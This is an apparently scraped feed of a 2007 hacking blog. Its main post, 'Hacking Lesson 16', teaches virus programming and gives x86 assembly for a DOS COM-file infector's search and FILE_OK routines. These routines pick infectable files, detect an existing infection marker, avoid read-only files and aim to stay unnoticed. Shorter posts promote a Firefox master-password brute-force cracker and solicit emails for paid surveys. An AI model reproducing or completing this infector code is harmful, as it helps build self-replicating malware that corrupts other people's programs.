type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=6901744821388719532' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6901744821388719532'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6901744821388719532'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-15.html' title='HACKING LESSON 15'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-266499053649649939</id><published>2007-04-07T00:50:00.001+05:30</published><updated>2007-05-26T12:00:55.919+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Basics of Virus Programming'/><title type='text'>HACKING LESSON 16</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;If our search mechanism as a whole also uses the &lt;b&gt;z &lt;/b&gt;flag to tell the main controlling program that it has found a file to infect (&lt;b&gt;z&lt;/b&gt;=file found, &lt;b&gt;nz&lt;/b&gt;=no file found) then our completed search function can be written like this:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;              &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;FIND_FILE:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;dx,OFFSET COMFILE&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov&lt;span style=""&gt;    &lt;/span&gt;al,00000110B&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ah,4EH ;perform search first&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;      &lt;/span&gt;21H&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;                  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;FF_LOOP:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;or &lt;span style=""&gt;       &lt;/span&gt;al,al ;any possibilities found?&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jnz &lt;span style=""&gt;     &lt;/span&gt;FF_DONE ;no - exit with z reset&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;call &lt;span style=""&gt;     &lt;/span&gt;FILE_OK ;yes, go check if we can infect it&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jz &lt;span style=""&gt;        &lt;/span&gt;FF_DONE ;yes - exit with z set&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ah,4FH ;no - search for another file&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;      &lt;/span&gt;21H&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jmp &lt;span style=""&gt;    &lt;/span&gt;FF_LOOP ;go back up and see what happened&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;FF_DONE:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;ret ;return to main virus control routine&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Study this search routine carefully. If it tells the virus to infect a program which does not have room for the virus, then the newly infected program may be inadvertently ruined. A good FILE_OK routine must perform two checks: &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;(1) It must check a file to see if it is too long to attach the virus to, and&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;(2) It must check to see if the virus is already there. If the file is short enough, and the virus is not present, FILE_OK should return a “go ahead” to the search routine.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;On entry to FILE_OK, the search function has set up the DTA with 43 bytes of information about the file to check, including its size and its name. Suppose that we have defined two labels, FSIZE and FNAME in the DTA to access the file size and file name respectively. Then checking the file size to see if the virus will fit is a simple matter. Since the file size of a COM file is always less than 64 kilobytes, we may load the size of the file we want to infect into the &lt;b&gt;ax &lt;/b&gt;register:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;mov ax,WORD PTR [FSIZE]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Next we add the number of bytes the virus will have to add to this file, plus 100H. The 100H is needed because DOS will also allocate room for the PSP, and load the program file at offset 100H. To determine the number of bytes the virus will need automatically, we simply put a label VIRUS at the start of the virus code we are writing and a label END_VIRUS at the end of it, and take the difference. If we add these bytes to &lt;b&gt;ax&lt;/b&gt;, and &lt;b&gt;ax &lt;/b&gt;overflows, then the file which the search routine has found is too large to permit a successful infection. An overflow will cause the carry flag &lt;b&gt;c &lt;/b&gt;to be set, so the file size check will look something like this:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;                    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;FILE_OK:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ax,WORD PTR [FSIZE]&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;add &lt;span style=""&gt;    &lt;/span&gt;ax,OFFSET END_VIRUS - OFFSET VIRUS + 100H&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jc &lt;span style=""&gt;        &lt;/span&gt;BAD_FILE&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;.&lt;o:p&gt;&lt;/o:p&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;GOOD_FILE:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;xor &lt;span style=""&gt;     &lt;/span&gt;al,al&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;ret&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;          &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;BAD_FILE:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;al,1&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;or &lt;span style=""&gt;       &lt;/span&gt;al,al&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;ret&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The next problem that the FILE_OK routine must deal with is how to avoid infecting a file that has already been infected. This can only be accomplished if the virus has some understanding of how it goes about infecting a file. We have replaced the first few bytes of the host program with a jump to the viral code. Thus, the FILE_OK procedure can go out and read the file which is a candidate for infection to determine whether its first instruction is a jump. If it isn’t, then the virus obviously has not infected that file yet. There are two kinds of jump instructions which might be encountered in a COM file, known as a &lt;span style=""&gt;near jump &lt;/span&gt;and a &lt;span style=""&gt;short jump&lt;/span&gt;. The virus we create here will always use a near jump to gain control when the program starts. Since a short jump only has a range of 128 bytes, we could not use it to infect a COM file larger than 128 bytes. The near jump allows a range of 64 kilobytes. Thus it can always be used to jump from the beginning of a COM file to the virus, at the end of the program, no matter how big the COM file is (as long as it is really a valid COM file). A near jump is represented in machine language with the byte E9 Hex, followed by two bytes which tell the CPU how far to jump. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Thus, our first test to see if infection has already occurred is to check to see if the first byte in the file is E9 Hex. If it is anything else, the virus is clear to go ahead and infect. Looking for E9 Hex is not enough though. Many COM files are designed so the first instruction is a jump to begin with. Thus the virus may encounter files which start with an E9 Hex even though they have never been infected. The virus cannot assume that a file has been infected just because it starts with an E9. It must go farther. It must have a way of telling whether a file has been infected even when it does start with E9. If we do not incorporate this extra step into the FILE_OK routine, the virus will pass by many good COM files which it could infect because it thinks they have already been infected. While failure to incorporate such a feature into FILE_OK will not cause the virus to fail, it will limit its functionality. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;One way to make this test simple and yet very reliable is to change a couple more bytes than necessary at the beginning of the host program. The near jump will require three bytes, so we might take two more, and encode them in a unique way so the virus can be pretty sure the file is infected if those bytes are properly encoded. The simplest scheme is to just set them to some fixed value. We’ll use the two characters “VI” here. Thus, when a file begins with a near jump followed by the bytes “V”=56H and “I”=49H, we can be almost positive that the virus is there, and otherwise it is not. To read the first five bytes of the file, we open it with DOS Interrupt 21H function 3D Hex. This function requires us to set &lt;b&gt;ds:dx &lt;/b&gt;to point to the file name (FNAME) and to specify the access rights which we desire in the &lt;b&gt;al &lt;/b&gt;register. In the FILE_OK routine the virus only needs to read the file. Yet there we will try to open it with read/write access, rather than read-only access. If the file attribute is set to read-only, an attempt to open in read/write mode will result in an error (which DOS signals by setting the carry flag on return from INT 21H). This will allow the virus to detect read-only files and avoid them, since the virus must write to a file to infect it. It is much better to find out that the file is read-only here, in the search routine, than to assume the file is good to infect and then have the virus fail when it actually attempts infection. Thus, when opening the file, we set &lt;b&gt;al &lt;/b&gt;= 2 to tell DOS to open it in read/write mode. If DOS opens the file successfully, it returns a &lt;span style=""&gt;filehandle &lt;/span&gt;in &lt;b&gt;ax&lt;/b&gt;. This is just a number which DOS uses to refer to the file in all future requests. The code to open the file looks like this:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;                &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ax,3D02H&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;dx,OFFSET FNAME&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt; &lt;/span&gt;&lt;span style=""&gt;     &lt;/span&gt;21H&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jc &lt;span style=""&gt; &lt;/span&gt;&lt;span style=""&gt;       &lt;/span&gt;BAD_FILE&lt;o:p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;Once the file is open, the virus may perform the actual read operation, DOS function 3F Hex. To read a file, one must set &lt;b&gt;bx &lt;/b&gt;equal to the file handle number and &lt;b&gt;cx &lt;/b&gt;to the number of bytes to read from the file. Also &lt;b&gt;ds:dx &lt;/b&gt;must be set to the location in memory where the data read from the file should be stored (which we will call START_IMAGE). DOS stores an internal &lt;span style=""&gt;file pointer &lt;/span&gt;for each open file which keeps track of where in the file DOS is going to do its reading and writing from. The file pointer is just a four byte long integer, which specifies which byte in the selected file a read or write operation refers to. This file pointer starts out pointing to the first byte in the file (file pointer = 0), and it is automatically advanced by DOS as the file is read from or written to. Since it starts at the beginning of the file, and the FILE_OK procedure must read the first five bytes of the file, there is no need to touch the file pointer right now. However, you should be aware that it is there, hidden away by DOS. It is an essential part of any file reading and writing we may want to do. When it comes time for the virus to infect the file, it will have to modify this file pointer to grab a few bytes here and put them there, etc. Doing that is much faster (and hence, less noticeable) than reading a whole file into memory, manipulating it in memory, and then writing it back to disk. For now, though, the actual reading of the file is fairly simple. It looks like this:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;            &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;mov bx,ax ;put handle in bx&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov cx,5 ;prepare to read 5 bytes&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov dx,OFFSET START_IMAGE ;to START_IMAGE&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov ah,3FH&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;   &lt;/span&gt;21H ;go do it&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;We will not worry about the possibility of an error in reading five bytes here. The only possible error is that the file is not long enough to read five bytes, and we are pretty safe in assuming that most COM files will have more than four bytes in them. Finally, to close the file, we use DOS function 3E Hex and put the file handle in &lt;b&gt;bx&lt;/b&gt;. Putting it all together, the FILE_OK procedure looks like this:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;                                            &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;FILE_OK:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;dx,OFFSET FNAME ;first open the file&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ax,3D02H ;r/w access open file&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;      &lt;/span&gt;21H&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jc &lt;span style=""&gt;        &lt;/span&gt;FOK_NZEND ;error opening file - file can’t be used&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;bx,ax ;put file handle in bx&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;push &lt;span style=""&gt; &lt;/span&gt;bx ;and save it on the stack&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;cx,5 ;read 5 bytes at the start of the program&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;dx,OFFSET START_IMAGE ;and store them here&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ah,3FH ;DOS read function&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;      &lt;/span&gt;21H&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;pop &lt;span style=""&gt;    &lt;/span&gt;bx ;restore the file handle&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ah,3EH&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;int &lt;span style=""&gt;      &lt;/span&gt;21H ;and close the file&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;ax,WORD PTR [FSIZE] ;get the file size of the host&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;add &lt;span style=""&gt;    &lt;/span&gt;ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add size of virus to it&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jc &lt;span style=""&gt;        &lt;/span&gt;FOK_NZEND ;c set if ax overflows (size &gt; 64k)&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;cmp &lt;span style=""&gt;   &lt;/span&gt;BYTE PTR [START_IMAGE],0E9H ;size ok-is first byte a near jmp?&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jnz &lt;span style=""&gt;     &lt;/span&gt;FOK_ZEND ;not near jmp, file must be ok, exit with z&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;cmp &lt;span style=""&gt;   &lt;/span&gt;WORD PTR [START_IMAGE+3],4956H ;ok, is ’VI’ in positions 3 &amp; 4?&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;jnz &lt;span style=""&gt;     &lt;/span&gt;FOK_ZEND ;no, file can be infected, return with Z set&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;          &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;FOK_NZEND:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;mov &lt;span style=""&gt;   &lt;/span&gt;al,1 ;we’d better not infect this file&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;or &lt;span style=""&gt;       &lt;/span&gt;al,al ;so return with z reset&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;ret&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;FOK_ZEND:&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;xor &lt;span style=""&gt;     &lt;/span&gt;al,al ;ok to infect, return with z set&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;ret&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal"&gt;&lt;span style="font-family:Arial;"&gt;This completes our discussion of the search mechanism for the virus.&lt;/span&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-266499053649649939?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/266499053649649939/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=266499053649649939' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/266499053649649939'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/266499053649649939'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-16.html' title='HACKING LESSON 16'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-9027677745836976175</id><published>2007-04-06T23:16:00.000+05:30</published><updated>2007-05-07T14:57:42.499+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Making Money Online'/><title type='text'>MAKING ONLINE MONEY IN INDIA</title><content type='html'>&lt;h1 style="text-align: justify;"&gt;&lt;span style="font-size:130%;"&gt;Paid Surveys -----&lt;/span&gt;&lt;/h1&gt;&lt;h1  style="text-align: justify;font-family:arial;"&gt;&lt;span style="font-size:85%;"&gt;The most frequently asked question today is&lt;a href="http://www.paidsurveys.co.in/surveytips.htm"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/a&gt; --- Can I really get paid to take online surveys in India?&lt;/span&gt;&lt;/h1&gt;&lt;div style="text-align: justify;"&gt; Yes, you can really get paid to take online surveys, but the situation is little different for Indians as compared to American's however the situation is changing and in near future there will be tremendous opportunities for Indians to earn money Online.&lt;br /&gt;&lt;br /&gt;However, in todays scenario also there are several paid survey companies that are open to Indian citizens. They all pay you to participate in paid surveys. The earning from these surveys ranges from &lt;span style="font-weight: bold; color: rgb(255, 0, 0);font-size:130%;" &gt;20 Rs to 100 Rs&lt;/span&gt; per survey and can be more. But you need to be patient because these survey companies are not sending surveys on a daily basis. Depending on your profile u will be invited to participate. There can be a chance that you receive only one survey per month.&lt;br /&gt;&lt;br /&gt;And be aware of articles saying that you can earn an easy money of Rs 15K to 30K per month just by filling survey forms....its not that easy....A simple survey itself will take around 15 to 30 mins...even if u complete a survey in less time than a predetermined minimum – usually in the range of 8-10 minutes that would normally take 20 minutes to complete....u wont get paid....&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;A nominal amount that a person can earn per month would be around &lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);"&gt;1500 Rs&lt;/span&gt;&lt;/span&gt; to &lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold; font-style: italic;"&gt;2000&lt;/span&gt;&lt;/span&gt; &lt;span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);font-size:130%;" &gt;Rs&lt;/span&gt; per month per company........&lt;br /&gt;&lt;br /&gt;Due to some legal requirements we cannot directly paste the link to the survey companies here....whoever is interested in joining the panel can send an email to &lt;span style="font-weight: bold; font-style: italic; color: rgb(51, 51, 255);"&gt;hackinme@gmail.com, within 24 hrs you will receive an invitation from the company itself.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;$&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-9027677745836976175?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/9027677745836976175/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=9027677745836976175' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/9027677745836976175'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/9027677745836976175'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/making-online-money-in-india_06.html' title='MAKING ONLINE MONEY IN INDIA'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-602723638401808182</id><published>2007-04-06T00:47:00.000+05:30</published><updated>2007-04-26T15:25:44.996+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>Fire Master 2.1 - Firefox Master Password Recovery Tool</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_tGUVOS5hsyc/RjB2kuRtA1I/AAAAAAAAAC4/uzxLa3NLSlw/s1600-h/firefox-128.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 85px; height: 85px;" src="http://2.bp.blogspot.com/_tGUVOS5hsyc/RjB2kuRtA1I/AAAAAAAAAC4/uzxLa3NLSlw/s200/firefox-128.png" alt="" id="BLOGGER_PHOTO_ID_5057672754806719314" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:100%;"&gt;If you have forgotten the master password, then using FireMaster you can find out the master password and get back your lost information. It uses various methods such as dictionary, hybrid and brute force attack to crack the password.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-602723638401808182?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/602723638401808182/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=602723638401808182' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/602723638401808182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/602723638401808182'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day-6th-april-2007.html' title='Fire Master 2.1 - Firefox Master Password Recovery Tool'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_tGUVOS5hsyc/RjB2kuRtA1I/AAAAAAAAAC4/uzxLa3NLSlw/s72-c/firefox-128.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2478287023780592521</id><published>2007-04-05T20:39:00.000+05:30</published><updated>2007-05-06T21:52:39.014+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Search Engine'/><title type='text'>SEARCHING SEARCH ENGINE (Lesson 1)</title><content type='html'>&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;Most of the people uses search engine by just dropping in some keywords and then looking for what turns up. Whereas if you use make proper use of some syntaxes you can easily get what you are looking for.&lt;br /&gt;&lt;br /&gt;Here we cannot promote the name of any search engine so i'm using the letter "G" to denote the search engine name.&lt;br /&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;Boolean function-&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;AND&lt;/b&gt; - This function is default i.e. if u search for anything without using a function, G will search for all of them. &lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);font-size:100%;" &gt;E.g.:&lt;/span&gt;&lt;span style="font-size:100%;"&gt; hacking black book - u will get the result for all of em can be in a single document can be in different document some containing "hacking", some containing "black" and some "book".&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;pre  style="text-align: justify;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;OR&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; - If you want that either word is acceptable. E.g.: Hacking or black or book &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;" "&lt;/b&gt; - If you want the exact phrase you group your search with parentheses. &lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);font-size:100%;" &gt;E.g.:&lt;/span&gt;&lt;span style="font-size:100%;"&gt; "hacking black book" will show all the pages where all three of them are together and in same sequence.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;Using * - &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style=""&gt; &lt;/span&gt;Searching for " hack * book" in G would give results as "hacking black book", "hacking blue book", "hacking red book" and so on. 